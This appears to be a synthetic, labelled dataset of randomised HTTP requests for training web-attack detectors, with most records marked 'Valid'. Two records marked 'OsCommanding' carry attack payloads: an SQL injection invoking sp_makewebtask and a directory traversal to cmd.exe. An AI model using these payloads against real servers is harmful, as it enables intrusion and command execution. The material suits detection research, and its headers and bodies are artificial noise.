Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: tnEtetc-o, py-diw;q=0.7, hcal0s-hnfm
Cache-Control: min7ib=la
Client-ip: 172.196.89.146
Cookie: 4b=ssbgsoundo;9u3bxrmNitet=6700;ttottarst=replacet;wmimePftpU9l=eoj;o1em1paepttfopt=resvexeci;emlrsKNadcj=4 sae
Cookie2: $Version="13"
Date: Sat, 10 Apr 04 18:49:34 CET
ETag: "YWfEAKRtn_k6G1Cuo8dc"
Expect: swrdoohr
From: kntoo@5rda2fql.com
If-Modified-Since: Sat, 18 Aug 07 01:23:39 CET
If-Unmodified-Since: Tue, 16 Mar 10 14:40:25 GMT
If-Match: "_.v601oxu@uvzf57-Hf"
If-None-Match: "xgvVJ8aMEtLN7JC@FB.s"
If-Range: "EaKoFiWQ@_aPCvkBMqOT"
Max-Forwards: 5873
MIME-Version: 0.7
Pragma: uciisin='scmwi3OA'
Proxy-Authorization: Basic eWllZ29hOnFva3AwMnJl
Authorization: Digest username="ene9hafo"
Range: -4356,562-2281
Referer: /riq1xki/earlbalc/raiiti.shtml
TE: trailers,deflate;q=0.9,deflate;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 1.6; hh-nb; rv:1.2.5) Gecko/72003484
UA-CPU: x86
UA-Disp: 9784,4196,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8126x925
Via: 3.1 185.226.106.185, 2.3 129.13.215.78:6014, HTTP/8.4 164.226.39.173
Transfer-Encoding: gzip
Upgrade: ttc3d/1.2, jllptm/3.7
Warning: 288 www.thnieil.tiff "ono32ramres" "Tue, 12 Jan 10 22:01:15 CET"
X-Forwarded-For: 212.135.218.165
X-Serial-Number: 84276248829844359
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nwiRtgneiwem=crtntbamsio&eeic=tlte le@li&dtcevi6qo=a5@teautBqsA&jinrcp1ax=8958

End - Id: 7126
Start - Id: 14600
class: Valid
GET /eztltoU6w3eEu3ug/naiageydo/gF5n3hx3tH-NIgqU7YFp/eLr3h/gtuohehlrislm/tQfn4RE8l2.PXflpg9I/sCYT1zRPVH/NF3LQwp-EY/o1pklJ/iroSfes.msf?ektXelrtLas=%5BngLt&hnethwaE6=nEe&nhNasiiejh=hwtIe6e&ftiyaaeotet1u5N=47213&setlO=e8qezqerwyatmleit&l36ee=nDrehtuIso&atne1gm=37709&9leimn=fpS1hnJtPref&ai2eov=nDv&yhwadm=ruv&mt=rm2InKKC%40&ovw=90&ztlnLntnjols=cpgR&n2pwsjefheokR=+lu8escriptej%25eacceptoowindow.open%5Ct8upc&rsgtusdlFtnos8a=xwa HTTP/1.0
Host: www.ib1ee.it:884
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: raCDi-Tn;q=0.4
Cache-Control: max-stale
Client-ip: 24.117.75.187
Cookie: euntehgotsa=670;wusntqe=jk;N8T@=hlrwi7
Cookie2: $Version="23"
Date: Mon, 10 Dec 07 02:57:04 GMT
ETag: W/"oXAYmJKz_rFi9g3SM5b"
Expect: HgEdii=4rzw2ll
From: es2ntogi@en5eitt1.de
If-Modified-Since: Fri, 05 Mar 04 11:27:47 GMT
If-Unmodified-Since: Wed, 09 Dec 09 19:27:38 GMT
If-Match: *
If-None-Match: "QZVHf70Mhe_7M0yfwO"
If-Range: *
Max-Forwards: 282
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: oeooen miaa0al=k3tnrkq
Authorization: Basic bm1udHNhOmVyeWk=
Range: 45-4785,-21867,70176-3030
Referer: /medsii/cuews/7tHisk/T8nera.asmx
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 6.7; vs-ns; rv:1.5.9) Gecko/73425540
UA-CPU: Sparc
UA-Disp: 1652,237,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 042x922
Via: 2.6 www.rphgmh.htm
Transfer-Encoding: u7nr
Upgrade: aAup/3.4, wlhsoh/9.7, nbao/4.6
Warning: 000 www.numyS7n.jpeg "esddptrgentnybcO" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 12480
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14600
Start - Id: 7766
class: Valid
POST /dQ-/raa/zOYD/Hobseo/t75/Tnfohte/zc/hIv9g-eWV5XI.sh? HTTP/1.0
Content-Length: 65
Content-Language: eglaaseB
Content-Encoding: compress
Content-Location: http://www.1sot.net/ahrltac/rCsAyFl.pdf
Content-MD5: c3Ryc1RjN3VoaWZlOGE1dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Feb 09 08:10:22 GMT
Last-Modified: Mon, 27 Aug 07 23:53:09 CET
Host: www.ssxeina.gov
Connection: aj6qTn
Accept: text/*, image/*
Accept-Charset: windows-1254, x-mac-hebrew, x-mac-arabic
Accept-Encoding: 
Accept-Language: 86torz0-r, sg-rDe5at, mime-aLMoR;q=0.4
Cache-Control: max-age=150
Client-ip: 200.184.5.24
Cookie: ece6grNacCa1dEl=384817;xFGcd7=37249986;xmetaiwsock_streamS40C7=s|;eiio=tmnz;o6=&rRd3r?;qoq=6aeFRuoiu4inese
Cookie2: $Version="143"
Date: Fri, 17 Aug 07 04:02:28 UTC
ETag: W/"8RQB1Qe.P@oXtZte.vHq"
Expect: hfthel=r3nclwo;Iululai=lIlcohii
From: aueghrP@epx9atfOth.fr
If-Modified-Since: Thu, 13 Dec 07 10:23:52 GMT
If-Unmodified-Since: Tue, 19 Feb 08 20:43:08 CET
If-Match: *
If-None-Match: *
If-Range: "xhEUtX.XuuaAuaLtK4"
Max-Forwards: 5813
MIME-Version: 2.6
Pragma: 8urdLcee='erq5lee'
Proxy-Authorization: Digest opaque="sebismn"
Authorization: Basic dHNoamU6cHJzYw==
Range: 42-,574-0,04-96557
Referer: http://ee4tunh.it/Luoiihlt/uuwk/itog95.php3
TE: gzip,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/7.0 (Machintosh; U; Mac OS X 5.4; Re-4o; rv:4.9.7) Gecko/60374279
UA-CPU: x86
UA-Disp: 6054,768,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 782x104
Via: 5.5 84.97.29.116, 4.4 243.137.210.43, nluet/8.7 www.crdl.css
Transfer-Encoding: identity
Upgrade: hen/2.3, tkocy/8.4, cNad/2.7, rStxee/8.1
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 246.243.72.110
X-Serial-Number: 575735447
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hoat=:9&a4stexc3etS=drtK20DB0BM9&8yalrcsc=7766&fsWnhbttn=mdrshb

End - Id: 7766
Start - Id: 26528
class: Valid
GET /stjej/2iaeelS/lCOzk9lbi9F/rTnXtaea/eomasnEsahtarsie/cEtntstEolm/i4poebWvlaoritrdbe.aspx? HTTP/1.1
Host: www.are5uSwd.st
Connection: etlah
Accept: text/html;q=0.3, application/postscript
Accept-Charset: iso-2022-kr;q=0.1, utf-8;q=0.7, cp-950;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 134.90.132.179
Cookie: ri3utieoonqo0=152747
Cookie2: $Version="0"
Date: Thu, 19 Feb 04 12:59:32 CET
ETag: "wkR70Hd1M5uZ-nw"
Expect: tta7=ndhftly
From: IitaesA@fwzeietc.uk
If-Modified-Since: Sun, 30 Aug 09 05:26:06 UTC
If-Unmodified-Since: Thu, 08 Mar 07 08:16:53 GMT
If-Match: *
If-None-Match: "0QAjtdqca6CHlUykV"
If-Range: "xCRpjhMQi-UzYhlgtnr2"
Max-Forwards: 49
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic dTVvbjpoYW10N2lU
Authorization: Basic RGhvZW5kQzp1UGFjaXJ0cg==
Range: -51243,13953-
Referer: http://Naawfhne.be/qoah62/ysfe.gif
TE: deflate
Trailer: Range
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 7.4; in-pO; rv:2.3.8) Gecko/10261495
UA-CPU: MIPS
UA-Disp: 196,1836,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 987x6257
Via: 8.9 www.anStsnn.html, ga9Kce/9.5 www.laemhe.shtml, FTP/9.9 157.215.49.190
Transfer-Encoding: identity
Upgrade: ant/0.2, ebe/2.0
Warning: 503 www.rEangso.jpeg "tesd4si" "Wed, 14 May 08 12:40:15 GMT"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26528
Start - Id: 36422
class: OsCommanding
GET /havinguDtX6jf@sFgEAf/Cp9-/rgKlg@mRVA/6ZdDv/tB8lQ0odLSelqrpgje/nk2wx/s9iYrqP_d8q6JE/mTndhndbnihqhmlecn/nsmah/taOodkd75/isNslsjute/eeqoatatasoFge.msf?Cz7ZFKHy=%27%3B++++EXEC+++master.dbo.sp_makewebtask+++%27c%3A%5Cinetpub%5Cwwwroot%5Cseaeter.png%27%2C+++++%27SELECT++aFseet+++FROM+++teE+WHERE+++++xtype%3D%27%27U%27%27%27&saniRbke=3emhhn HTTP/1.1
Host: 181.68.26.133:78
Connection: close
Accept: application/*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip, gzip, identity, compress;q=0.5
Accept-Language: nyrn-r;q=0.3, se8-ejo0lf;q=0.8, prin-hdnse;q=0.3, 7nuqr-s
Cache-Control: min-fresh=47
Date: Fri, 13 May 05 16:54:27 CET
If-Match: *
If-Range: Sun, 20 Jul 08 11:41:49 GMT
Max-Forwards: 109
Referer: http://www.tddoe.uk/raweroer/htTxn2.tar
User-Agent: Mozilla/6.0 (compatible; k16bnccra; WinNT; lsdSneiDwt; iR2Obet4D7)

null

End - Id: 36422
Start - Id: 8316
class: Valid
GET /q252GTYTWwget-Fmxw.cfm?1ytiRd=l3 HTTP/1.1
Host: 134.217.195.135
Connection: hintaaa
Accept: */*
Accept-Charset: iso-8859-3, us-ascii, iso-8859-5, x-mac-ce;q=0.7, iso-8859-3;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 143.52.91.240
Cookie: 7bincludesSACLNX=t
Cookie2: $Version="210"
Date: Wed, 06 Oct 04 02:18:54 UTC
ETag: W/"lQINYY0cK-nGz8mysE"
Expect: 0axE=agh6iirq
From: vAneoO@xoHsahh.it
If-Modified-Since: Fri, 19 Dec 08 12:56:16 GMT
If-Unmodified-Since: Tue, 14 Sep 04 17:20:10 UTC
If-Match: "hJkUGP.L_Smm98oUoIrF"
If-None-Match: "azpOG2U0ff_f9W5Cg3k"
If-Range: Tue, 20 Jun 06 12:04:45 CET
Max-Forwards: 487
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic bHF0bnJzbWk6bHhsbWk=
Authorization: NTLM YmNhdXJ0ZWh1bjRlUjl3NWFlbW04b2Vycml0NnlkRGluNDNyaW50Z2Np
Range: -1511,1647-46745
Referer: /st3csso6/Fcwaony/hhij9l/ar4Sryhe/tefLl.swf
TE: deflate
Trailer: Accept-Language
User-Agent: sfnEi3hin/9.8.9.6
UA-CPU: StrongARM
UA-Disp: 8260,7505,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 071x825
Via: 5.5 162.157.214.105, HTTP/5.5 www.eitsh.png, 1.7 142.60.210.193
Transfer-Encoding: identity
Upgrade: rREn/2.9, di70e5/6.8, Oae/2.0, tCr/0.8, vn7low/5.7
Warning: 477 203.254.244.133:8 "Cspr5Osssgcfn" 
X-Forwarded-For: 35.25.216.107
X-Serial-Number: 9179541
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8316
Start - Id: 16605
class: Valid
GET /34l/EeocwBlnxud/rx4cUYAsua0/31l@0Pzz.F.jpg?oa=eizmY&joretc7Jk=casehuvmoj&lhrd=bwea%3CxaBi8go&ddtcotsme4=nlm+o%7Ctr+d&elhnwUhnm6ee=Oidka+dnt%3BcAa4&booeaalr=729457&updateO-imgcw67S5C=i&rgeUdaee9orAEm=90&nzhYeIahn=522238931&ir=eA&Lpi=eiframeexecz&nmaludFchthu=tmtndghLfhttpsebbi&lgoA=30472&b@Jnulll.A=8705&d3B%uG8NxN8I=uasterati HTTP/1.1
Host: www.8fOkv.be
Connection: andwswb
Accept: application/zip, video/quicktime;q=0.6, text/html;q=0.0
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: 
Accept-Language: rsN3-testGg
Cache-Control: no-store
Client-ip: 115.162.152.91
Cookie: sxtermb@=z4eroalra
Cookie2: $Version="6"
Date: Fri, 07 Jul 06 10:21:21 UTC
ETag: "dP@cVrOnf6RldbCGxPY"
Expect: iti9=oighizt;Rhe8
From: dwou@hguthnrf9e.org
If-Modified-Since: Fri, 18 Aug 06 01:53:32 UTC
If-Unmodified-Since: Thu, 08 May 08 22:25:12 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Aug 06 18:24:41 UTC
Max-Forwards: 3
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest qop=ensne
Authorization: Digest uri=http://av3hoEb.be/ohrrt/eJt4s/saur7e1/nsEL.mp3
Range: -508053,86460-25,-68
Referer: /tuIm/paoy4/ttmhNst7/uryh.nsf
TE: trailers,gzip;q=0.4
Trailer: Connection
User-Agent: Mozilla/0.7 (X11; U; SunOS sun4u 4.1; ar-dt; rv:6.7.5) Gecko/36488704
UA-CPU: StrongARM
UA-Disp: 049,0120,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1536x5641
Via: FTP/2.8 www.Nirueo.png
Transfer-Encoding: deflate
Upgrade: Nca/5.9, s4h/1.3
Warning: 105 www.Ia3bwst.html "meseeoOE" 
X-Forwarded-For: 155.254.22.166
X-Serial-Number: 4070028617537255
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16605
Start - Id: 5783
class: Valid
PUT /omSG/zq/ezYdzRXruvyvHk0pf/JLsrwqnDateatoe/ua8ehe5tclgteaeHl.php3? HTTP/1.1
Content-Length: 244
Content-Language: bie,m,8uasRrte
Content-Encoding: deflate
Content-Location: /aoebt/gaa0m.sh
Content-MD5: dHRsbnRlbGZydDIycjFtaw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Nov 05 23:24:13 UTC
Last-Modified: Thu, 06 Sep 07 13:07:30 GMT
Host: 90.111.54.119
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=8
Client-ip: 229.124.181.240
Cookie: esce=H>m nse~ettV$i qc;o6rua1Inlzae=sdeve9rrdrbknull;alnwma8laail=ndjDeG.
Cookie2: $Version="46"
Date: Tue, 27 Jan 04 13:23:37 CET
ETag: "_iHgKGCmvAf6hTv-"
Expect: IC8awotu=ilhissh;t7trinn
From: o0am9fre@olkaeabem.net
If-Modified-Since: Mon, 01 Mar 10 09:47:09 GMT
If-Unmodified-Since: Sun, 04 May 08 13:35:03 GMT
If-Match: "@4tYeeAhf_@LbtYIX_VW"
If-None-Match: *
If-Range: Fri, 12 Mar 10 16:03:45 UTC
Max-Forwards: 1987
MIME-Version: 3.6
Pragma: TeeFe=du
Proxy-Authorization: NTLM dGFvcnRvc2xyaW9nNjNycnJldHBmY3RvdnJuenRzc2hURWxt
Authorization: Basic UXVwajZ0Nzg6emNvYWU=
Range: 5-5072
Referer: /dlateti/msann.jsp
TE: chunked,deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.3 (Windows; U; WinNT 2.4; lo-rn; rv:4.4.3) Gecko/80129640
UA-CPU: 68000
UA-Disp: 9613,3615,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 910x9129
Via: FTP/2.6 www.sbne.jpg, FTP/4.4 www.rarotamc.gif:2
Transfer-Encoding: gzip
Upgrade: tgo/5.7, lybtio/8.6
Warning: 669 175.253.249.242:78324 "slmoebrsy6Uetltw" 
X-Forwarded-For: 37.13.252.62
X-Serial-Number: 94351330899239471408
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ajeixahaf=0828059&eaeetnx4etf8rt=5&edhnto=e4b&DqriOu4dnB=mth&nIntuoxmtide23l=wOlTcic4j&positionFW2M6i=\+rn&FinsertL0= ls6ihtsioo7 wgetghomemH&sao7a3minic4d=ewutleh9hnano5d&fi4sdnTsma5q=vd0tlw-4eaueyre&ns1Knutrhbfn=bwmedrnf1&sLvyec4lSMv=3168

End - Id: 5783
Start - Id: 7392
class: Valid
POST /uuwsBNTNcLw9yqmkKU.gif? HTTP/1.0
Content-Length: 130
Content-Language: s2AstIho,tkee7w8o
Content-Encoding: identity
Content-Location: /ercxesgl/jepzla.mdb
Content-MD5: eWVkVGRjZnBlMnJnb25lbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 10 12:59:01 GMT
Last-Modified: Wed, 04 Jul 07 05:33:21 CET
Host: 158.51.168.70
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 237.119.239.10
Cookie: 07ltw57dort=iapeesws6j;raen=1017875
Cookie2: $Version="34"
Date: Tue, 16 Oct 07 01:55:09 CET
ETag: W/"3AxRsEszWGY9.fC"
Expect: 100-continue
From: p4dremdP@srvk.ch
If-Modified-Since: Sat, 10 Nov 07 05:11:01 GMT
If-Unmodified-Since: Wed, 07 Nov 07 23:33:57 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Apr 05 21:26:18 UTC
Max-Forwards: 5075
MIME-Version: 0.7
Pragma: odpnbp=zecvi3Vq
Proxy-Authorization: Basic aXl0Yjpzc2NoaXJ0bg==
Authorization: ehAnO adInrad=btRtjpO
Range: 12-25753
Referer: /hteeei.doc
TE: gzip;q=0.8,gzip;q=0.5,trailers
Trailer: Pragma
User-Agent: aianelz/0.6
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 850x401
Via: t4r/5.4 49.246.28.139, 3.9 255.249.211.195
Transfer-Encoding: identity
Upgrade: pst/9.7, oub/7.2
Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 47.72.36.31
X-Serial-Number: 557256998518
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tseaiepbivS3eun=eIW&MWha9ZA-JV=baerur8sntMb&kda8eSmfsIfi=149709&eovCeZsRauhii=txct&tdttihl1E=794965&0tes=xBNuLY-_qdet&1j2=86782573

End - Id: 7392
Start - Id: 7101
class: Valid
POST /0as@8X/TOienycbm/sTaMi.css? HTTP/1.1
Content-Length: 7
Content-Language: u
Content-Encoding: deflate
Content-Location: http://ahoonmwt.it/ni7s3la.asmx
Content-MD5: cjByUHlzeWhFcm5raW5leQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Aug 09 18:43:01 GMT
Last-Modified: Thu, 20 Nov 08 13:59:12 UTC
Host: www.pfdleycrv.it
Connection: close
Accept: audio/x-wav;q=0.9, video/*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=22636
Client-ip: 132.107.60.185
Cookie: kdpy=socsot;nnepebtKm4ol=esZwjSRRo;ruc=ar;Q4UIgh@NIZU=osjfucC_Po8;dwb6thFtoiafa=eaeeyrmntihawsYnj
Cookie2: $Version="11"
Date: Tue, 06 Mar 07 22:18:31 UTC
ETag: W/"S5-7GinuP7n6CWZ"
Expect: 100-continue
From: sneehouu@vual.net
If-Modified-Since: Sun, 03 Aug 08 20:16:13 CET
If-Unmodified-Since: Mon, 15 Nov 04 01:06:03 CET
If-Match: *
If-None-Match: "0.ab8e4Wo@ia1N@kK"
If-Range: *
Max-Forwards: 818
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic dGp4cnQ6U2VvaHdsbmE=
Range: -1123,49-40,9-39799
Referer: http://Igttn.net/adyb.asmx
TE: trailers
Trailer: Accept-Language
User-Agent: ejcNdM-sK http://www.scwnsew.com
UA-CPU: x86
UA-Disp: 5151,1845,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1536x3422
Via: FTP/0.7 24.39.188.138, FTP/6.4 www.htaNsoo.shtml, 1.3 www.yftjexw.gif
Transfer-Encoding: compress
Upgrade: nb9/4.8, ennjo/7.4
Warning: 817 144.31.134.157 "syge" "Mon, 18 Jan 10 11:34:49 GMT"
X-Forwarded-For: 60.44.207.26
X-Serial-Number: 317162195276859
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

x6ed=ia

End - Id: 7101
Start - Id: 23167
class: Valid
GET /dwDIsB.mdb? HTTP/1.0
Host: www.aaetnr.uk
Connection: close
Accept: application/*;q=0.5, text/*
Accept-Charset: windows-1255
Accept-Encoding: compress;q=0.5, compress
Accept-Language: fageon1s-ekddnn8h;q=0.4, 4esohj-or, ewlgtu-ne;q=0.8, Lhaua-p6ms0aw
Cache-Control: max-stale
Client-ip: 86.43.140.192
Cookie: 6J3S=vsnetns;mh3yp(pn;orEefehdssftsa=tg
Cookie2: $Version="920"
Date: Mon, 04 Oct 04 06:50:20 GMT
ETag: W/"EQvmylPqDP6@n8j@fVs"
Expect: srvh=dslq;Lte6owo
From: wtitbbt@Z2hi.ch
If-Modified-Since: Fri, 05 Aug 05 10:37:03 CET
If-Unmodified-Since: Fri, 30 May 08 20:19:52 GMT
If-Match: "Op8.1J-m_Pq8ZmQ90RIv"
If-None-Match: *
If-Range: Sat, 10 Dec 05 14:02:13 CET
Max-Forwards: 6251
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: ariihf uAaec=elRxHnr
Authorization: Digest uri=http://www.d59eEhri.it/h4os/tnr6shce/So0ooi.asp
Range: -362684,26-
Referer: http://www.wstNm.ch/ho2skie.conf
TE: deflate,chunked;q=0.9,chunked;q=0.4
Trailer: If-Unmodified-Since
User-Agent: Thnsaye (m8aX5.U; s0U6_iZS; 5S_Kor)
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 955x1403
Via: HTTP/0.4 229.80.62.23
Transfer-Encoding: deflate
Upgrade: aeo6t/4.4, matg/8.3, 0dn/5.9, uoO/0.4
Warning: 412 www.Fsjawe.gif "ecfj" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 23167
Start - Id: 43908
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.TnnebAt.st
Connection: close
Accept: video/*, audio/*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.8, deflate, compress, gzip, compress;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 196.15.105.143
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Tue, 25 Sep 07 15:41:48 GMT
ETag: W/"0oIq-QwFP03wjkKWU"
Expect: uthpmtzo
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Tue, 14 Jun 05 24:13:49 CET
If-Unmodified-Since: Sat, 26 Jan 08 06:20:32 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Apr 09 08:41:41 UTC
Max-Forwards: 612
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: I7d4 pxamohog=uiio
Authorization: jaier uicSij=Hxcaxs
Range: 6652-,-36477,66590-93
Referer: /ksqsnoE/nt9salg/Adat.pl
TE: trailers,chunked;q=0.3
Trailer: If-Match
User-Agent: Mozilla/1.8 (X11; U; Unix 5.8; wh-aa; rv:7.2.7) Gecko/33544451
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: nse/8.9 26.125.63.37
Transfer-Encoding: identity
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 432 www.i7dte.html "w6tbf" "Sat, 14 Feb 04 01:47:29 UTC"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43908
Start - Id: 19571
class: Valid
GET /li/KJxwindow.openyjVselectIO4oIn/jfJL/e-/altnissw/shhcolo6q0yor/oGULicCsBuDW.3p/CjH/V6Vudiv.AstdinE3/xEJ868FB7KMHOToS@.php3?iw2Hjho5usobhgo=9424&rdsare=et%2F%40opt7+x7re HTTP/1.1
Host: 72.149.3.52
Connection: glsa0rl
Accept: */*
Accept-Charset: x-mac-turkish, x-mac-greek;q=0.0
Accept-Encoding: deflate;q=0.9, compress, deflate, compress
Accept-Language: k-el;q=0.7, lyoolh-noterd;q=0.6, oae-Twm, dTmo-aiatuta, anac-Nx;q=0.1
Cache-Control: no-transform
Client-ip: 158.64.174.242
Cookie: tmnE= agthomekoQ;5to6n5A=8;eigOod=388811;foiArtewn=ipXaNx;aeeTatq=49107267;mNp2itSl0i=0se4qei
Cookie2: $Version="17"
Date: Wed, 30 May 07 15:25:07 UTC
ETag: W/"J0_kp2D-hp5UPgn"
Expect: paag7g=rbellrn
From: ogeen@6fmx.ch
If-Modified-Since: Wed, 07 May 08 09:48:40 UTC
If-Unmodified-Since: Sat, 30 Dec 06 02:18:25 UTC
If-Match: "irYHZdg3Tv9XrDrx"
If-None-Match: "29jQfmJJ9CzNXWOB"
If-Range: Tue, 11 Apr 06 16:32:51 UTC
Max-Forwards: 062
MIME-Version: 8.9
Pragma: ituet='nsdds4i'
Proxy-Authorization: Digest opaque="zaan"
Authorization: Digest nc=5AD3D3Dc
Range: 187147-0990,76-,-590377
Referer: http://www.eeutert.cz/aTtois.htm
TE: deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/2.0 (X11; U; Solaris 3.7; es-5b; rv:7.5.2) Gecko/76032465
UA-CPU: MIPS
UA-Disp: 3278,3940,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4605x2042
Via: 4.7 42.146.5.249, HTTP/5.6 www.wOitFy.png
Transfer-Encoding: deflate
Upgrade: tecthp/7.8
Warning: 960 180.194.110.22 "epoThsiWn" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19571
Start - Id: 30506
class: Valid
GET /thLMr94qm./QUQr-s1meta-5/Bue/tI.Wlf9im__YnY/nWVu6P8/neV/bgmhse/ifakmenia/Oaos/9i/n8eec3gnoqorn.php3? HTTP/1.0
Host: www.nehso.biz:80
Connection: ridahuns
Accept: video/*;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.2, deflate;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 82.124.54.145
Cookie: aji=nehoratB;eayShoxetjpn3=enp6aeahu;asHrobesuwsr=om
Cookie2: $Version="6"
Date: Thu, 13 Jan 05 09:35:56 CET
ETag: "KPHCJthG0o6bKtBQMm_"
Expect: 100-continue
From: qdtdedst@Snreomeo.de
If-Modified-Since: Wed, 30 Apr 08 03:24:00 UTC
If-Unmodified-Since: Tue, 19 May 09 06:41:59 CET
If-Match: *
If-None-Match: "a.-A2Q0QVRDJqn2DDtq"
If-Range: Wed, 03 Aug 05 12:09:11 UTC
Max-Forwards: 53
MIME-Version: 1.6
Pragma: etBgpecd=rn5l
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://Eeh8bo.ch/eaiph.sh
Range: 4-2253
Referer: /eewpyuoo.php4
TE: chunked;q=0.9,gzip;q=0.9
Trailer: Transfer-Encoding
User-Agent: s0pCNy2k http://www.lowe.uk
UA-CPU: MIPS
UA-Disp: 6844,128,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 710x3564
Via: HTTP/0.2 188.14.120.186:98130, 1.4 www.tuiuoTa.htm
Transfer-Encoding: compress
Upgrade: 5rir/1.2, ag6/9.0, lli/9.6, ihcn/5.0
Warning: 638 71.219.15.61 "hmtn" "Sat, 22 Jan 05 06:21:26 UTC"
X-Forwarded-For: 50.177.217.100
X-Serial-Number: 9887656877315806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30506
Start - Id: 7725
class: Valid
PUT /plrTtrtvn/rlxanh8nsmn/aneaetunbE/uXtmS36iEMmm2/-QPyexecB-nkY@replacey_/fhdcyauwcneM89/8ezl1/admint/WImetas835/JAhlkdeletetGJE.shtml? HTTP/1.0
Content-Length: 67
Content-Language: 4e7zeX,ois,BaOilnas
Content-Encoding: identity
Content-Location: http://www.ghwmatg.uk/Cs1a7/fmeeuto/mCea/m6ohhAei.pl
Content-MD5: ZWU4dWNobml0M2lhb1NJcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Apr 04 18:33:36 CET
Last-Modified: Sun, 24 Oct 04 14:03:05 CET
Host: www.eey8iieg.cz
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: cins=sm0re
